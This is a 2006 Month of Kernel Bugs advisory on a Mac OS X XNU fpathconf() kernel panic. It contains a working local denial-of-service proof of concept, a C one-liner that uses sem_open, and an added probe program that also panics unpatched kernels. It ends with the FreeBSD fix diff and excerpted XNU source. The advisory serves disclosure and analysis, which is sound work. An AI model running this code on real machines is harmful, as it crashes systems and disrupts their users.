MOKB-09-11-2006 OMG! PWNIES! M4C BUGS NOW COME IN P1NK!

Bug details
Title: Mac OS X fpathconf() syscall denial of service
Description: The Mac OS X kernel (XNU) fpathconf() syscall does not handle file descriptor types it does not recognise: the default arm of its type switch calls panic(), so any non-privileged local user who can obtain such a descriptor can crash the machine, an exploitable local denial of service. FreeBSD fixed the same bug on Tue Jun 27 23:08:36 2000 UTC (6 years, 4 months ago).
Author/Contributor: Ilja Van Sprundel - found the issue and reported it to Apple some time ago (silently, yet only partially, fixed; thus still broken).
NA <NA> - MOKB release, "proof of concept".
References:
Proof of concept or exploit: One-liner:
#include <fcntl.h>      /* O_CREAT */
#include <semaphore.h>  /* sem_open() */
#include <stdint.h>     /* intptr_t */
#include <sys/stat.h>   /* S_IRWXU */
#include <unistd.h>     /* fpathconf() */

int main(void) {
        /* On Darwin sem_t is an int and sem_open() hands back the new descriptor's index cast to
         * sem_t *; that descriptor is a POSIX semaphore, a type fpathconf()'s switch has no case for. */
        int fd = (int)(intptr_t)sem_open("DaringWussball", O_CREAT, S_IRWXU, 1);
        fpathconf(fd, 0);   /* reaches the default: arm and panics the kernel */
}

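Added example, written for this page and not part of the MOKB advisory or Ilja's PoC: a small probe that builds descriptors of several types (pipe, AF_UNIX socket pair, regular file, a deliberately bad fd and, on Apple systems only and only when compiled with -DPROBE_SEM, a POSIX semaphore) and calls fpathconf() on each, reporting either the value or the errno instead of assuming what the kernel will do. The probe_* function names, the temporary file name and the semaphore name are assumptions made for the example, as is the remark that Darwin's sem_open() returns the descriptor index disguised as a sem_t * (that is my reading of why the one-liner above works, not something the advisory states). It doubles as a regression check: a kernel that handles the semaphore case answers the last probe with an errno, an unpatched XNU panics, so run that probe only on a machine you can afford to reboot.

```c
/* Added example (not from the MOKB advisory): probe fpathconf() across
 * descriptor types and report a value or an errno for each.  Build with
 * -DPROBE_SEM on an Apple system to include the semaphore case, which is
 * the one that panics an unpatched XNU. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE           /* glibc: declare mkstemp(), socketpair() etc. */
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <unistd.h>
#ifdef __APPLE__
#include <semaphore.h>
#include <stdint.h>
#endif

/* Returns 0 and stores the answer in *out, or the errno fpathconf() set.
 * (-1 with errno left at 0 is a legitimate "no limit" answer.) */
int probe_fpathconf(int fd, int name, long *out)
{
    errno = 0;
    long v = fpathconf(fd, name);
    if (v == -1 && errno != 0)
        return errno;         /* EBADF, EINVAL, ... */
    *out = v;
    return 0;
}

/* DTYPE_PIPE: the kernel answers _PC_PIPE_BUF without touching a vnode. */
int probe_pipe(long *out)
{
    int p[2];
    if (pipe(p) != 0)
        return errno;
    int rc = probe_fpathconf(p[0], _PC_PIPE_BUF, out);
    close(p[0]);
    close(p[1]);
    return rc;
}

/* DTYPE_SOCKET: a connected AF_UNIX pair asked the same question. */
int probe_socket(long *out)
{
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0)
        return errno;
    int rc = probe_fpathconf(sv[0], _PC_PIPE_BUF, out);
    close(sv[0]);
    close(sv[1]);
    return rc;
}

/* DTYPE_VNODE: a throwaway regular file, asked for _PC_NAME_MAX (VOP_PATHCONF path). */
int probe_file(long *out)
{
    char path[] = "/tmp/fpathconf-probe-XXXXXX";   /* constructed template name */
    int fd = mkstemp(path);
    if (fd < 0)
        return errno;
    unlink(path);
    int rc = probe_fpathconf(fd, _PC_NAME_MAX, out);
    close(fd);
    return rc;
}

#ifdef __APPLE__
/* POSIX semaphore: the descriptor type the advisory's one-liner hits.  Darwin's
 * sem_open() returns the descriptor index cast to sem_t * (sem_t is an int there),
 * so the pointer value is the fd.  An unpatched XNU panics inside this probe. */
int probe_semaphore(long *out)
{
    sem_t *s = sem_open("/fpathconf-probe", O_CREAT, S_IRWXU, 1); /* constructed name */
    if (s == SEM_FAILED)
        return errno;
    int fd = (int)(intptr_t)s;
    int rc = probe_fpathconf(fd, _PC_PIPE_BUF, out);
    sem_close(s);
    sem_unlink("/fpathconf-probe");
    return rc;
}
#endif

static void report(const char *what, int rc, long v)
{
    if (rc == 0)
        printf("%-10s value=%ld\n", what, v);
    else
        printf("%-10s errno=%d (%s)\n", what, rc, strerror(rc));
}

int main(void)
{
    long v = 0;
    int rc;
    rc = probe_pipe(&v);                          report("pipe", rc, v);
    rc = probe_socket(&v);                        report("socket", rc, v);
    rc = probe_file(&v);                          report("file", rc, v);
    rc = probe_fpathconf(-1, _PC_PIPE_BUF, &v);   report("bad fd", rc, v);
#if defined(__APPLE__) && defined(PROBE_SEM)
    rc = probe_semaphore(&v);                     report("semaphore", rc, v);
#endif
    return 0;
}
```

The interesting line in the output is the last one: EBADF for the bad descriptor shows the fd lookup failing cleanly before any type switch runs, and on a fixed kernel the semaphore probe should land in the same "errno, not panic" category as the PSXSHM and KQUEUE cases in the XNU code quoted further down.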
Debugging information:

It's been tested on an up-to-date (09-11-2006) Mac OS X installation, running on an Intel "shipping" Mac.

rome:~NA uname -a
Darwin rome.local 8.8.1 Darwin Kernel Version 8.8.1: Mon Sep 25 19:42:00 PDT 2006;
root:xnu-792.13.8.obj~1/RELEASE_I386 i386 i386

===================================================================
RCS file: /usr/local/www/cvsroot/FreeBSD/src/sys/kern/kern_descrip.c,v
retrieving revision 1.84
retrieving revision 1.85
diff -u -p -r1.84 -r1.85
--- src/sys/kern/kern_descrip.c	2000/05/26 02:04:33	1.84
+++ src/sys/kern/kern_descrip.c	2000/06/27 23:08:36	1.85 <--- 6 years, 4 months ago
@@ -36,7 +36,7 @@
  * SUCH DAMAGE.
  *
  *	@(#)kern_descrip.c	8.6 (Berkeley) 4/19/94
- * $FreeBSD: /usr/local/www/cvsroot/FreeBSD/src/sys/kern/kern_descrip.c,v 1.84 2000/05/26 02:04:33 jake Exp $
+ * $FreeBSD: /usr/local/www/cvsroot/FreeBSD/src/sys/kern/kern_descrip.c,v 1.85 2000/06/27 23:08:36 alfred Exp $
  */
 
 #include "opt_compat.h"
@@ -642,7 +642,7 @@ fpathconf(p, uap)
 		return (VOP_PATHCONF(vp, uap->name, p->p_retval));
 
 	default:
-		panic("fpathconf");
+		return (EOPNOTSUPP);
 	}
 	/*NOTREACHED*/
 }
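Review bot: returning EOPNOTSUPP from the default: arm removes the panic, but EINVAL is the errno POSIX specifies for fpathconf() when the variable has no association with the given file, and it is also what the XNU version quoted below returns for DTYPE_PSXSHM and DTYPE_KQUEUE; consider `return (EINVAL);` so callers see one error for every unsupported descriptor kind. The `/*NOTREACHED*/` comment after the switch stays accurate, since every arm now returns.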

------ xnu-792.6.76/bsd/kern/kern_descrip.c
/*
 * Return pathconf information about a file descriptor.
 */
int
fpathconf(p, uap, retval)
	struct proc *p;
	register struct fpathconf_args *uap;
	register_t *retval;
{
	int fd = uap->fd;
	struct fileproc *fp;
	struct vnode *vp;
	struct vfs_context context;
	int error = 0;
	short type;
	caddr_t data;


	AUDIT_ARG(fd, uap->fd);
	if ( (error = fp_lookup(p, fd, &fp, 0)) )
		return(error);
	type = fp->f_type;
	data = fp->f_data;

	switch (type) {

	case DTYPE_SOCKET:
	    (...)
		error = 0;
		goto out;

	case DTYPE_PIPE:
	        *retval = PIPE_BUF;
		error = 0;
		goto out;

	case DTYPE_VNODE:
		(...)
		goto out;

	case DTYPE_PSXSHM:
	case DTYPE_KQUEUE:
		error = EINVAL;
		goto out;

	default:
		panic("fpathconf (unrecognized - %d)", type);   <----- not covered cases, panic.
	}
	/*NOTREACHED*/
out:
	fp_drop(p, fd, fp, 0);
	return(error);
}
------ xnu-792.6.76/bsd/kern/kern_descrip.c